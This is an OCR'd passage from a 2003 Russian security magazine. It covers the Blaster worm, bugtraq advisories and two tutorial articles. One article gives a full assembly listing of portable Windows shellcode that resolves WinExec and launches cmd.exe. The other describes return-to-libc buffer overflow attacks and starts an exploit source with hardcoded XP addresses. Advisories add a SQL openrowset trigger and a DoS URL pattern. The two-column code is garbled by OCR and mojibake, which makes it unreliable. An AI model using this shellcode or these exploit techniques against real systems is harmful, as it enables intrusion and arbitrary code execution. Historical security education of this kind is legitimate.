ла 7 целей, затем 18, 48 и наконец 8 июля группа oc192
Security предоставила универсальный исходный код, по-
ражающий все версии Windows 2000 и Windows XP. Пос-
ле этого события волна взломов в Интернете подскочила
в сотни раз. Каждый скачавший этот код мог спокойно
получить административный доступ к любой Windows-си-
стеме в сети. Многие кинулись скачивать патчи с офици-
ального сайта Microsoft, но буквально через 3 недели сайт
оказался недоступным. В ночь c 1 на 2 августа хакеры
атаковали сайт Microsoft, до того считавшийся одним из
наиболее защищенных ресурсов Интернета. Работа сай-
та была парализована на час и сорок минут. Эксперты
связывают нападение с готовящейся массовой атакой на
Интернет, которую хакеры хотят осуществить через брешь
в ОС Windows. Атака затронула как главную страницу
сайта http://www.microsoft.com, так и многие другие адре-
са, включая страницу службы технической поддержки
http://www.support.microsoft.com и портал для разработчи-
ков http://www.msdn.microsoft.com.
Microsoft уже признала факт хакерской атаки, но при
этом оградила себя от возможных домыслов по поводу
использования взломщиками какой-либо уязвимости в
софте, обеспечивающем работу сайта. По словам офи-
циального представителя Microsoft Шона Сандволла, спе-
циалистами компании установлено, что хакеры соверши-
ли «обычную атаку на сервер, однако не воспользовались
никакими «дырами» в программном обеспечении». О де-
талях нападения Сандволл распространяться не стал.
Но 12 августа после полудня произошло то, чего так
опасались LSD и все мировые организации по сетевой
безопасности. В сети появился червь, использующий
уязвимость DCOM. За считанные минуты он заполонил
европейскую часть Интернета. Полный анализ червя
предоставили большинство производителей антивирус-
ных продуктов, но первый временный патч выпустила
Symantec. FixBlast сканирует ваш компьютер на пред-
мет заражения Win32.Blaster, удаляет файл червя и его
следы в системе. Самый полный отчёт предоставила,
на мой взгляд, Лаборатория Касперского, т.к. только
они объяснили принцип генерации IP-адресов и скани-
рования портов жертв.
Как делают Blaster
Первое, что обнаружили программисты антивирусных ла-
бораторий, – это текстовые (ASCII) строки внутри файла
следующего содержания:
63
 безопасность
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making
money and fix your software!!
Что в переводе звучит так:
ß õî÷ó ñêàçàòü, ËÞÁËÞ ÒÅÁß, SAN!!
Áèëëè Ãåéòñ, ïî÷åìó òû äîïóñêàåøü òàêîå? Ïðåêðàùàé äåëàòü
äåíüãè è èñïðàâü ñâî¸ ïðîãðàììíîå îáåñïå÷åíèå!!
После полного анализа червя выяснилось следующее:

Червь проникает в компьютер, используя удалённое
выполнение команд посредством переполнения буфе-
ра.

Выполняется GET-запрос на закачку тела вируса че-
рез команду tftp.

Помещение файла msblast.exe в %WinDir%\system32
и его запуск.

Регистрация червя в ключе автозапуска:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run

Ключ: windows auto update=«msblast.exe»

Червь открывает порт 69 (tFTP-server) для последую-
щего размножения.
Далее идёт процесс сканирования и генерации IP-ад-
ресов новых жертв. Это происходит следующим образом:
червь сканирует IP-адреса текущей подсети и пытается
соединиться с 20 IP-адресами для инфицирования уязви-
мых компьютеров, после этого червь делает паузу в тече-
ние 1,8 секунды, а затем снова сканирует следующие 20
IP-адресов и повторяет этот процесс в бесконечном цик-
ле до перезагрузки компьютера. Например, мы имеем
подсеть 192.168.1.0/24, IP-адрес заражённого компьюте-
ра 192.168.1.134, червь сканирует так:
192.168.1.0-19
ïàóçà 1.8 ñåê
192.168.1.20-39
ïàóçà è ò.ä.
Более того, червь имеет 2 метода сканирования IP-
адресов: в 60% случаях червь выбирает случайный адрес
подсети (A.B.C.D), где D равен 0, а A, B, C случайно выб-
раны из диапазона 1-255. Таким образом, сгенерирован-
ная подсеть находится в диапазоне [1-255].[1-255].[1-
255].0. В 40% червь сканирует свою подсеть. Он опреде-
ляет адрес локального компьютера (A.B.C.D), устанавли-
вает D в ноль и выбирает значение C. Если C больше,
чем 20, то червь выбирает случайное число от 1 до 20.
Если C меньше или равно 20, червь не изменяет его.

Запуск командной оболочки «cmd.exe» на TCP-порту
4444.
Как заявляет Лаборатория Касперского, если бы не
было 1.8-секундной задержки, то многие узлы Интернета
не выдержали бы такой нагрузки и отказали.
Вполне возможно, что это было учтено автором червя
для более успешной атаки на сайт обновлений Microsoft.
Побочным эффектом червя является как раз то, из-
за чего компании всего мира терпят убытки. При полу-
чении доступа используется не универсальный метод,
64
поэтому в большинстве версий Windows отказывает кри-
тическая системная служба Remote Procedure Call, и ком-
пьютер автоматически перезагружается в течение ми-
нуты. В этот момент пользователь наблюдает окно с
ошибкой «RPC service failing» и отсчёт времени до пере-
загрузки.
Но это ещё не всё. 16 августа 2003 года червь запус-
кает DDoS-атаку на сервер http://www.windowsupdate.com,
пытаясь таким образом затруднить или прервать его
работу.
Трудно представить ее последствия, так как в связи с
перегрузкой многих узлов возможны были региональные
отключения сети Интернет, как это было в случае с SQL
Slammer.
Однако, как всегда, вмешался Его Величество Случай –
кризис энергетической системы США сорвал запланиро-
ванную атаку или отложил на некоторое время.
А как же лекарство?
1. Официальный патч от Microsoft(c):
http://www.microsoft.com/technet/treeview/
default.asp?url=/technet/security/bulletin/MS03-026.asp
2. Временный патч FixBlast от Symantec(c):
http://securityresponse.symantec.com/avcenter/venc/data/
w32.blaster.worm.removal.tool.html
Если у вас какие-то проблемы со скачиванием файла,
то вы можете просто отключить службу DCOM. Пуск →
Выполнить → dcomcnfg.exe → Службы компонентов →
Компьютеры → Мой компьютер → Свойства по умолча-
нию – убрать галку «Разрешить использование DCOM на
этом компьютере».
Также заблокируйте порт 135 TCP и 69 UDP на ваших
межсетевых экранах.
Используемые сокращения:
1. DCOM – архитектура, предназначенная для взаимо-
действия компонентов COM.
2. UDP – User Datagram Protocol (протокол пользователь-
ских дэйтаграмм).
3. SP – Service Pack (набор исправлений)..
4. RPC – Remote Procedure Call (удалённый вызов про-
цедур).
4. DDoS – Distributed Denial of Service Attack (распреде-
лённая атака на отказ в обслуживании).
5. Proof of concept code – исходный код, доказывающий
существование уязвимости.
При написании статьи использовались материалы сле-
дующих источников:
http://www.securityfocus.com
http://www.lsd-pl.net
http://www.xfocus.com
http://www.securitylab.ru
http://www.void.ru
http://www.symantec.ru
http://www.packetstormsecurity.nl
http://www.viruslist.com http://www.compulenta.ru
http://www.salon.com

Удаленный DoS против Avant Browser
Уязвимость обнаружена в Avant Browser. Удаленный
пользователь может сконструировать HTML, который ава-
рийно завершит работу браузера.
Удаленный пользователь может сконструировать URL,
который, когда будет загружен в браузере целевого
пользователя, аварийно завершит работу браузера. При-
мер:
http://AAAAAAA[more 780 chars]
Уязвимость обнаружена в Avant Browser 8.02.
Отказ в обслуживании через
некорректные POST-запросы
в Lotus Domino Web Server
Отказ в обслуживании обнаружен в Lotus Domino Web
Server (nhttp.exe). Удаленный пользователь может аварий-
но завершить работу веб-сервера.
Удаленный пользователь может послать незавершен-
ный POST-запрос используя s_Validation-форму, чтобы эк-
сплуатировать эту уязвимость. Удаленный пользователь
может также послать POST-запрос, используя h_PageUI-
форму с несуществующим параметром, чтобы эксплуа-
тировать уязвимость. Примеры см. в источнике сообще-
ния.
Уязвимость обнаружена в Lotus Domino Web Server 5.x,
6.0.
Для устранения уязвимости установите соответству-
ющее обновление, которое можно скачать отсюда: http://
www-1.ibm.com/support/docview.wss?uid=swg21104528
Выполнение произвольного сценария
в определенном домене в RealOne Player
Уязвимость обнаружена в RealOne Player. Удаленный
пользователь может сконструировать медийный файл,
который выполнит произвольный код сценария в опреде-
ленном домене.
Удаленный пользователь может сконструировать спе-
циально обработанный SMIL-файл, который, когда будет
загружен целевым пользователем, выполнит произволь-
ный Javascript или VBScript-код в домене произвольного
URL.
Уязвимость обнаружена в RealOne Player (English only),
RealOne Player v2 for Windows (all language versions), and
RealOne Enterprise Desktop (all versions, standalone and as
configured by the RealOne Desktop Manager).
Для устранения уязвимости используйте «Check for
Update» в меню «Tools».
№9(10), сентябрь 2003
bugtraq
Удаленное переполнение буфера
через MDAC в MS SQL-сервере
(подробности эксплуатации)
Unicode переполнение буфера обнаружено в MDAC, ко-
торая используется Server QL-DMO библиотекой. Удален-
ный атакующий может выполнить произвольный код на
целевой системе. Уязвимость можно эксплуатировать
через широковещательные запросы.
Одна из особенностей сетевой библиотеки SQL-сер-
вера – возможность запрашивать список SQL-серверов в
локальной сети. Для этого посылается широковещатель-
ное UDP-сообщение к 1434 порту, которое достигнет всех
приложений в локальной сети. Эта функция – компонент
SQL-DMO, который используется SQL Server Service
Manager (всякий раз при запуске), Enterprise Manager (при
регистрации сервера), Query Analyzer и SQL (при клике
на «...» клавишу), DTS (при выборе SQL-сервера) и т. п.
Все SQL-серверы, получающие широковещательный
запрос, отвечают стандартным UDP-пакетам. Если зло-
намеренная машина отвечает на этот широковещатель-
ный запрос слишком длинным пакетом, произойдет пе-
реполнение буфера. Переполнение происходит в
UNICODE-строке, так что для эксплуатации этого пере-
полнения буфера должен использоваться Venetian-метод.
Любые утилиты SQL-сервера, которые используют
SQL-DMO-функцию для поиска SQL-серверов, уязвимы к
этому нападению. Нападающий может использовать не-
сколько методов для эксплуатации этой уязвимости:

Установить службу, слушающую на 1434 UDP-порту,
которая будет посылать эксплоит при получении дан-
ных. В этом случае злонамеренный сервис должен
находиться в той же самой подсети.

Засыпать удаленную подсеть UDP-пакетами, надеясь,
что кто-то сделает уязвимый запрос. Например, посы-
лайте злонамеренные пакеты каждые 2 сек к
192.168.3.255, которые достигнут всех машин на
192.168.3.x подсети. Когда кто-то наконец пошлет ши-
роковещательный UDP-пакет, то они примут злонаме-
ренный пакет и подвергнутся действию эксплоита.

Также возможно через низко привилегированную учет-
ную запись в MS SQL-сервере послать запрос напря-
мую к IP-адресу на сети. Следующая SQL-инструкция
заставит SQL-сервер запросить хост с именем SERVER
с UDP-пакетом:
SELECT * FROM openrowset( 'SQLOLEDB', ↵
'server=SERVER\instancename;uid=sa;pwd=', '')
Могут быть и другие методы заставить SQL-сервер
посылать UDP-запрос и вызвать переполнение.
Уязвимость обнаружена в Microsoft Data Access
Components 2.5sp1 – 2.7 SP1.
Составил Александр Антипов
65
безопасность

Построение
переносимого Shell-кода
для Windows-систем

Всё чаще и чаще обсуждаются аспекты атак

на Windows-системы. Основные возможности
атак на семейство данных систем были
уже рассмотрены, но не стоит забывать о том,
что при построении атаки на переполнение
буфера в большинстве случаев атакующий
сталкивается с построением shell-кода.

СТАНИСЛАВ ГОШКО

66

Shell-код – это двоичный код, который выполняется в кон-
тексте другой программы. Когда уязвимость уже обнару-
жена и начинается написание эксплоита, необходимо для
себя решить, будет ли эксплоит зависеть только от вер-
сии уязвимой программы или ещё он будет зависеть от
версии операционной системы. Если атакующий хочет,
чтобы его эксплоит работал на большинстве систем, то
ему необходимо построить shell-код, который бы не опи-
рался на «жёсткие» адреса WIN API-функций.
Для построения такого рода кода необходимо, чтобы
shell-код удовлетворял следующим требованиям:

Поиск адреса ядра (kernel32.dll).

Поиск адреса WIN API-функции GetProcAddress.

Поиск адресов других WIN API-функций при помощи
функции GetProcAddress.

Запуск необходимых нам WIN API-функций по найден-
ным адресам.
безопасность
стре edx будет находиться адрес ядра. Данный код специ-
ально модифицирован таким образом, чтобы в нём не
было нулевых байт.
Теперь перейдём к поиску адреса функции GetProc-
Address. Поиск данной функции используется в большин-
стве современных вирусов, ориентированных на Windows-
системы.
По определённому смещению в PE-заголовке мы мо-
жем найти адрес таблицы экспортов. В таблице экспортов
узнаем количество указателей на функции, расположение
таблицы указателей имен и адрес таблицы ординалов.
Перебираем указатели (и ординалы), проверяя при этом
имена функций, на которые они указывают при совпаде-
нии с GetProcAddress. При совпадении возьмем ординал и
по таблице адресов мы получим адрес функции.
Рассмотрим пример поиска адреса функции GetProc-
Address:

Каким образом возможно выполнить первое требова- mov ebx,edx ; Ñîõðàíèì óêàçàòåëü
mov edi,dword ptr [edx+3Ch] ; Àäðåñ
ние? При запуске любой программы в операционных сис- ; PE-çàãîëîâêà
темах семейства Windows она вызывается из ядра. По- add edi,edx ; +Àäðåñ kernel
cmp word ptr [edi],'EP' ; Ïðîâåðêà íà PE
этому первый и относительно сложный способ поиска jne Exit ; Íå ðàâíî – âûõîäèì
адреса ядра основан на поиске в стеке. Но если мы вос- push edx ; Ñîõðàíèì àäðåñ kernel
пользуемся этим способом, то наш shell-код станет очень add ebx,[edi+78h] ; Ïîëó÷èì àäðåñ
большим, поэтому мы пойдём другим путём. ; òàáëèöû ýêñïîðòîâ
mov ecx,[ebx+18h] ; Êîëè÷åñòâî óêàçàòåëåé
Второй способ обнаружения адреса ядра – при помощи mov esi,[ebx+20h] ; Óêàçàòåëü íà òàáëèöó
SEH. Что же такое SEH? Это структурированный обработ- ; óêàçàòåëåé èìåí
mov edi,[ebx+24h] ; Óêàçàòåëü íà òàáëèöó
чик исключений. К примеру, если мы пытаемся писать в ; îðäèíàëîâ
ядро, то будет вызываться исключение и обрабатываться add esi,edx ; Àäðåñ òàáëèöû èìåí
; â ïàìÿòè
оно будет при помощи SEH. Адрес обработчика исключе- add edi,edx ; Àäðåñ òàáëèöû îðäèíàëîâ
ний всегда лежит внутри ядра, так что для поиска адреса ; â ïàìÿòè
cld ; Ïîèñê âïåðåä
ядра нам всего лишь необходимо найти последний обра- add ebp,8 ; ebp óêàçûâàåò
ботчик. По адресу fs:[0] лежит номер текущего обработчи- ; íà ñëåäóþùóþ ñòðîêó
Search: ; Èùåì ôóíêöèþ GetProcAddress
ка исключений. Ищем, пока не найдём 0xFFFFFFFF (но- lodsd ; Áåðåì óêàçàòåëü èç òàáëèöû óêàçàòåëåé
мер системного обработчика). Этот адрес, в отличие от ад- add eax,edx ; Ïîëó÷àåì àäðåñ ïàìÿòè
xchg esi,eax ; Â esi óêàçàòåëü íà èìÿ
реса функции ExitThread в NT, всегда лежит в kernel32.dll. ; íàéäåííîé ôóíêöèè
Рассмотрим пример поиска адреса kernel:
xchg edi,ebp ;
; Óêàçûâàåì íà èìÿ íóæíîé
mov eax, fs:[ebx] ; Óêàçàòåëü íà ñïèñîê ; íàì ôóíêöèè
; îáðàáîò÷èêîâ push ecx ; Êëàä¸ì ecx â ñòåê
inc eax ; Óâåëè÷èâàåì eax íà 1 xor ecx,ecx ; Îáíóëÿåì ecx
next_seh: add cl,15 ; Ðàçìåð ñòðîêè
xchg eax, ebx ; Îáìåíèâàåì ñîäåðæèìîå eax repe cmpsb ; Ñðàâíèâàåì
; c ebx jc restore1
mov eax, [ebx-1] ; Íîìåð òåêóùåãî îáðàáîò÷èêà rest2:
inc eax ; Óâåëè÷èâàåì eax íà 1 xchg esi,eax ; Âîññòàíîâèì çíà÷åíèå esi
jnz next_seh ; ßâëÿåòñÿ ëè îí
; ñèñòåìíûì (-1)? pop ecx ; Âîññòàíîâèì êîëè÷åñòâî
mov edx, [ebx-1+4] ; Àäðåñ îáðàáîò÷èêà ; óêàçàòåëåé
xchg ax, dx ; Ýêâèâàëåíòíî xchg edi,ebp ; Âîññòàíîâèì óêàçàòåëü
; xor dx,dx (eax=0) ; íà îðäèíàëû
xor eax,eax ; Îáíóëÿåì eax
je Found ; Íàøëè!
mov ax,1001h ; Ïîìåùàåì â eax inc edi ; Íåò – ïðîáóåì ñëåäóþùóþ
dec ax ; 1000 ; ôóíêöèþ
next_block: inc edi ; Óêàçàòåëü íà ñëåäóþùèé
cmp word ptr [edx],'ZM' ; Íà÷àëî? ; îðäèíàë
je found_MZ ; ÄÀ! loop Search
sub edx,eax ; Èùåì äàëüøå jmp Exit
jmp next_block restore1:
found_MZ: xor esi,esi ;
mov ebx,edx ; Ñîõðàíèì óêàçàòåëü mov si,61125 ; Ïîìåùàåì â esi ÷èñëî 15
mov edi,dword ptr [edx+3Ch] ; Àäðåñ sub si,61110 ;
; PE-çàãîëîâêà
add edi,edx ; +Àäðåñ kernel sub esi,ecx ; Âîññòàíàâëèâàåì óêàçàòåëü
cmp word ptr [edi],'EP' ; Ïðîâåðêà íà PE ; (edi) íà íà÷àëî ñòðîêè
jne Exit ; Íå ðàâíî – âûõîäèì sub edi,esi ;
jmp rest2 ;
В результате работы данного куска кода у нас в реги- Found:

№9(10), сентябрь 2003 67

 безопасность
xor eax,eax ; Îáíóëÿåì eax add ebx,[edi+78h] ; Ïîëó÷èì àäðåñ òàáëèöû
mov ax,word ptr [edi] ; ýêñïîðòîâ
; mov ecx,[ebx+18h] ; Êîëè÷åñòâî óêàçàòåëåé
; Âîçüìåì îðäèíàë mov esi,[ebx+20h] ; Óêàçàòåëü íà òàáëèöó
shl eax,2 ; Óìíîæèì íà ðàçìåð îðäèíàëà ; óêàçàòåëåé èìåí
mov esi,[ebx+1Ch] ; Óêàçàòåëü íà òàáëèöó mov edi,[ebx+24h] ; Óêàçàòåëü íà òàáëèöó
; àäðåñîâ ; îðäèíàëîâ
add esi,edx ; Ïîëó÷èì àäðåñ íà÷àëà add esi,edx ; Àäðåñ òàáëèöû èìåí
; òàáëèöû àäðåñîâ ; â ïàìÿòè
add esi,eax ; È àäðåñ íóæíîé ôóíêöèè add edi,edx ; Àäðåñ òàáëèöû îðäèíàëîâ
lodsd ; Ïðî÷èòàåì ; â ïàìÿòè
add eax,edx ; Äîáàâèì àäðåñ kernel cld ; Ïîèñê âïåðåä
add ebp,8 ; ebp óêàçûâàåò íà
; ñëåäóþùóþ ñòðîêó
В начале этого кода в edx хранится адрес kernel, а в Search: ; Èùåì ôóíêöèþ GetProcAddress
конце в eax хранится адрес функции GetProcAddress. lodsd ; Áåðåì óêàçàòåëü èç
; òàáëèöû óêàçàòåëåé
Третье и четвёртое требования выполняются достаточ- add eax,edx ; Ïîëó÷àåì àäðåñ ïàìÿòè
но легко. Для этого необходимо знание о том, с какими па- xchg esi,eax ; Â esi óêàçàòåëü íà èìÿ
; íàéäåííîé ôóíêöèè
раметрами запускаются необходимые нам WIN API-функции. xchg edi,ebp ;
Теперь построим переносимый shell-код для локаль- ; Óêàçûâàåì íà èìÿ íóæíîé
; íàì ôóíöèè
ной атаки на Win32-системы: push ecx ; Êëàä¸ì ecx â ñòåê
xor ecx,ecx ; Îáíóëÿåì ecx
.386 add cl,15 ; Ðàçìåð ñòðîêè
.model flat, stdcall repe cmpsb ; Ñðàâíèâàåì
extrn ExitProcess:proc jc restore1
.data rest2:
start: xchg esi,eax ; Âîññòàíîâèì çíà÷åíèå esi
;---------------[SUPA SHELLCODE]--------------------------
Getproc: pop ecx ; Âîññòàíîâèì êîëè÷åñòâî
mov esi,esp ; esi óêàçûâàåò íà âåðøèíó ; óêàçàòåëåé
; ñòåêà xchg edi,ebp ; Âîññòàíîâèì óêàçàòåëü
xor ecx,ecx ; îáíóëÿåì ecx ; íà îðäèíàëû
mov cl,169 ; ecx óêàçûâàåò íà òåêñòîâóþ je Found ; Íàøëè!
; ñòðîêó 'WinExec' inc edi ; Íåò – ïðîáóåì ñëåäóþùóþ
add esi,ecx ; È esi òåïåðü óêàçûâåò ; ôóíêöèþ
; íà 'WinExec' inc edi ; Óêàçàòåëü íà ñëåäóþùèé
push esi ; Êëàä¸ì esi â ñòåê ; îðäèíàë
mov ebp,esi ; È ebp òåïåðü óêàçûâàåò loop Search
; íà 'WinExec' jmp Exit
mov edi,esi ; È edi òåïåðü óêàçûâàåò restore1:
; íà 'WinExec' xor esi,esi ;
xor ecx,ecx ; Îáíóëÿåì ecx mov si,61125 ; Ïîìåùàåì â esi ÷èñëî 15
mov cl,27 ; È êëàä¸ì â cl 27 sub si,61110 ;
xor1: lodsb ; Çàãðóæàåì â al áàéò
cmp al,01 ; Ïðîâåðÿåì 1 ýòî èëè íåò sub esi,ecx ; Âîññòàíàâëèâàåì óêàçàòåëü
jne nextb ; Åñëè íåò – èùåì äàëüøå ; (edi) íà íà÷àëî ñòðîêè
xor al,01 ; Åñëè 1, òî îáíóëÿåì åãî è sub edi,esi ;
nextb: jmp rest2 ;
stosb ; Âîçâðàùàåì íà ìåñòî Found:
loop xor1 ; Òàêèì îáðàçîì, ìû xor eax,eax ; Îáíóëÿåì eax
; âîññòàíàâëèâàåì âñå mov ax,word ptr [edi]
; íóæíûå íàì íóëè ;
xor ebx,ebx ; Îáíóëÿåì ebx ; Âîçüìåì îðäèíàë
shl eax,2 ; Óìíîæèì íà ðàçìåð
mov eax, fs:[ebx] ; Óêàçàòåëü íà ñïèñîê ; îðäèíàëà
; îáðàáîò÷èêîâ mov esi,[ebx+1Ch] ; Óêàçàòåëü íà òàáëèöó
inc eax ; Óâåëè÷èâàåì eax íà 1 ; àäðåñîâ
next_seh: add esi,edx ; Ïîëó÷èì àäðåñ íà÷àëà
xchg eax, ebx ; Îáìåíèâàåì ñîäåðæèìîå ; òàáëèöû àäðåñîâ
; eax c ebx add esi,eax ; È àäðåñ íóæíîé ôóíêöèè
mov eax, [ebx-1] ; Íîìåð òåêóùåãî îáðàáîò÷èêà lodsd ; Ïðî÷èòàåì
inc eax ; Óâåëè÷èâàåì eax íà 1 add eax,edx ; Äîáàâèì àäðåñ kernel
jnz next_seh ; ßâëÿåòñÿ ëè îí call eax ; Ïîëó÷àåì àäðåñ ôóíêöèè
; ñèñòåìíûì (-1)? ; WinExec
mov edx, [ebx-1+4] ; Àäðåñ îáðàáîò÷èêà
xchg ax, dx ; Ýêâèâàëåíòíî push 1 ; Çàïîëíÿåì ñòåê
; xor dx,dx (eax=0) push ebp ;

xor eax,eax ; Îáíóëÿåì eax call eax ; Çàïóñêàåì "cmd.exe"

mov ax,1001h ; Ïîìåùàåì â eax Exit:
dec ax ; 1000 ;---------------------------------------------------------
next_block: db 'WinExec',01
cmp word ptr [edx],'ZM' ; Íà÷àëî? db 'GetProcAddress',01
je found_MZ ; ÄÀ! db 'cmd',01
sub edx,eax ; Èùåì äàëüøå konec:
jmp next_block .code
found_MZ: ;---------------------------------------------------------
mov ebx,edx ; Ñîõðàíèì óêàçàòåëü nop
mov edi,dword ptr [edx+3Ch] ; Àäðåñ ;---------------------------------------------------------
; PE-çàãîëîâêà end start
add edi,edx ; +Àäðåñ kernel end
cmp word ptr [edi],'EP' ; Ïðîâåðêà íà PE
jne Exit ; Íå ðàâíî – âûõîäèì Вот мы и построили переносимый shell-код для 32-бит-
push edx ; Ñîõðàíèì àäðåñ
; kernel ных систем семейства Windows.

68

Переполнение буфера в тэге Object
в Microsoft Internet Explore
(подробности)
Переполнение буфера обнаружено в Microsoft Internet
Explorer. Удаленный атакующий может выполнить произ-
вольный код на системе.
Переполнение буфера обнаружено в Microsoft Internet
Explorer при обработке HTML-файлов с чрезмерно длин-
ной строкой, содержащей «double-byte»-символы в свой-
стве Type тэга Object. Удаленный атакующий может скон-
струировать специально обработанную веб-страницу или
HTML-почтовое сообщение, чтобы выполнить произволь-
ный код на системе с привилегиями пользователя без
какого-либо взаимодействия с пользователем.
Уязвимость обнаружена в Internet Explorer 6 Service
Pack 1.
Обход ограничений безопасности
в Internet Explorer
(подробности)
Уязвимость обнаружена в Internet Explorer 6 Service
Pack 1 Japanese Edition. При определенных условиях уда-
ленный атакующий может автоматически загрузить и об-
работать определенный тэг, включенный с HTML-файлом
в My Computer zone без уведомления пользователя.
Если некоторый MIME-тип определен в Content-Type-
заголовке в HTTP-ответе и некоторая строка определена
в Content-Disposition-заголовке, эта строка будет автома-
тически загружена и открыта внутри Temporary Internet
Files (TIF) в Microsoft Internet Explorer. В результате злона-
меренный веб-сайт может автоматически выполнить зло-
намеренный сценарий. Выполненный сценарий раскроет
атакующему путь к TIF-каталогу.
Дополнительно, если уязвимость эксплуатируется че-
рез злонамеренную строку в Content-Disposition-заголов-
ке, тэг OBJECT будет обработан в «My Computer» зоне. В
результате злонамеренный веб-сайт может выполнить
произвольные программы на компьютере с привилегия-
ми пользователя.
Уязвимость обнаружена в Internet Explorer 6 Service
Pack 1 Japanese Edition.
Удаленное завершение работы
в Sun ONE и iPlanet Web Servers
на Windows-системах
Уязвимость обнаружена в Sun ONE и iPlanet Web Servers
на Windows-системах. Удаленный пользователь может
аварийно завершить работу веб-сервера.
Дополнительные подробности не раскрываются. Ин-
формацию о заплатах можно найти в источнике сообще-
ния.
Уязвимость обнаружена в Sun ONE Web Server 6.0 SP3-
SP5.
№9(10), сентябрь 2003
bugtraq
Удаленное переполнение буфера
в XML-функции базы данных Oracle
Несколько переполнений буфера обнаружено в Oracle
Database в XML-функциях базы данных. Удаленный
пользователь может получить доступ к сессии пользова-
теля базы данных.
Удаленный пользователь может вызвать несколько пе-
реполнений буфера в XML Database (XDB) функциях
Oracle9i Database Release 2 сервера. Удаленный пользо-
ватель может вызвать отказ в обслуживании на сервере
или перехватить активную сессию целевого пользовате-
ля базы данных. Уязвимость можно эксплуатировать, если
на сервере работает FTP- или HTTP-сервер.
Уязвимость обнаружена в Oracle9i Database Release 2
only.
Для устранения уязвимости сперва скачайте Oracle9i
Database Release 2, version 9.2.0.3 patchset. Затем уста-
новите соответствующую заплату, которую можно скачать
отсюда: http://metalink.oracle.com
Раскрытие конфигурации
Microsoft URLScan
при совместном использовании
с RSA’s SecurID
Уязвимость раскрытия информации обнаружена в RSA’s
SecurID, когда используется Microsoft URLScan. Удален-
ный пользователь может определить подробности
URLScan конфигурации на веб-сервере.
Если используется SecurID с URLScan, то в некоторых
случаях отклоненная информация будет возвращена уда-
ленному пользователю. Удаленный пользователь может
выполнить различные HTTP-запросы и, контролируя от-
веты, определить конфигурацию URLScan.
Когда удаленный пользователь запрашивает URL, ко-
торый будет отвергнут URLScan, веб-сервер возвратит
следующую информацию, например:
<INPUT TYPE=HIDDEN NAME="referrer" ↵
VALUE="Z2FZ3CRejected-By-UrlScanZ3EZ3FZ7EZ2Firm.ida">
Уязвимость обнаружена в RSA SecurID ACE/Agent 5.0.
Для устранения уязвимости в качестве приоритетного
ISAPI-фильтра установите SecurID-фильтр.
Поднятие локальных привилегий
через DameWare Mini Remote Control
Уязвимость обнаружена в DameWare Mini Remote Control
(часть DameWare NT Utilities). Локальный пользователь
может получить System-привилегии на целевом сервере,
используя эксплоит типа Shatter.
Локальный пользователь может послать специально
сформированное Windows Message к высокопривилегиро-
ванному процессу DWRCS.exe, чтобы заставить DameWare
выполнить произвольный код с System-привилегиями.
Уязвимость обнаружена в DameWare до версии
3.71.0.0.
Составил Александр Антипов
69
безопасность

АТАКА НА ПЕРЕПОЛНЕНИЕ
БУФЕРА ЧЕРЕЗ
НЕИСПОЛНИМЫЙ СТЕК
В WINDOWS NT/2000/XP

Атаки на переполнение буфера за последние 10 лет получили громадное распространение.

Практически во всех современных операционных системах предусматривается защита от
данных атак (Black Cat, Sun...). Поэтому не за горами то время, когда данная защита появится
и у Windows-систем. В данной статье будет рассматриваться атака на переполнение буфера
через неисполнимый стек.

СТАНИСЛАВ ГОШКО
70
 безопасность
Рассмотрим, чем отличается обычное переполнение бу-
push 0
фера от переполнения буфера через неисполнимый стек. call ExitProcess
Большинство атак на переполнение буфера строятся
comm1 db 'cmd',0
по следующей схеме: end start

Подготавливается мусор и вычисляются номера бай- end
тов, которые перетирают адрес возврата.

Подготавливается исполнимый код в качестве буфера. Теперь нам необходимо разобраться, как выглядит стек

Вычисляется адрес возврата при помощи отладчика, внутри функции WinExec. Рассмотрим схему стека внут-
так, чтобы он указывал на исполнимый код в стеке. ри WinExec (вызов данной функции отмечен восклица-

Затем подготовленный буфер, содержащий мусорные тельными знаками).
байты, новый адрес возврата и исполнимый код пере-
даются уязвимой программе.

Рассмотрим на схеме, как выглядит стек уязвимой про-

граммы в момент проведения обычной атаки на срыв стека:

Для построения нашей атаки нам наиболее важны зна-

Как вы могли заметить, исполнение shell-кода проис-
ходит прямо в стеке. Большинство защит ориентировано
на то, чтобы воспрепятствовать выполнению кода в сте-
ке, и данная защита очень хорошо работает против боль-
шинства эксплоитов.
Теперь для понимания функционирования эксплоитов,
использующих атаку через неисполнимый стек, рассмот-
рим простую программу, которая вызывает через WinExec
программу – «cmd.exe».
На языке С++ она бы выглядела так:
#include <windows.h>
void main ()
{
WinExec("cmd",1);
} Рассмотрим схему стека при реализации данной атаки:
чения, отмеченные восклицательными знаками. Первый
же параметр можно упустить.
Перейдём к конструированию нашей атаки. Мы долж-
ны так переполнить буфер, чтобы при возвращении из
функции мы попали прямиком в WIN API-функцию с за-
полненным стеком. И самое главное, что стек должен быть
заполнен корректно для вызова cmd.exe.
Разберём схему построения данной атаки:

Подготавливается имя программы («cmd»), мусор и вы-
числяются номера байтов, которые перетирают адрес
возврата.

Вычисляется адрес строки при помощи отладчика так,
чтобы он указывал на строку «cmd» в стеке.

Вычисляются адреса функций: WinExec, ExitProcess.

Затем подготовленный буфер, содержащий имя про-
граммы («cmd»), мусорные байты, новый адрес строки
и адреса функций, передаётся уязвимой программе.

В данной программе не видно вызова функции

ExitProcess, так как компилятор C++ сам заботится о кор-
ректном завершении программы.
Рассмотрим аналогичную программу на языке ассем-
блера:

.386
.model flat, stdcall
extrn ExitProcess:proc
extrn WinExec:proc
.data
dd 0
.code
start:
push 1
push offset comm1
call WinExec ; !!!!!

№9(10), сентябрь 2003 71

 безопасность
Как вы можете видеть по схеме стека, в момент атаки Рассмотрим листинг эксплоита:
мы упустили первый параметр функции WinExec. А также
мы поставили адрес функции ExitProcess в качестве адре- // example exploit by sl0n
са возврата из функции WinExec. После того, как консоль #include <stdio.h>
будет запущена, управление будет передано на функцию #include <windows.h>
ExitProcess, которая корректно завершит процесс. void main()
Теперь рассмотрим простую уязвимую программу и {
char garbage[1000];
построим для неё эксплоит, работающий через неиспол- char buffer[500];
нимый стек.
// àäðåñ ôóíêöèè WinExec äëÿ WIN XP
Рассмотрим листинг: char r_address1[8]="\xC6\x84\xE6\x77";
// àäðåñ ôóíêöèè ExitProcess äëÿ WIN XP
#include <stdio.h> char r_address2[8]="\xB5\x5C\xE7\x77";
#include <windows.h> // àäðåñ ñòðîêè "cmd" â ñòýêå
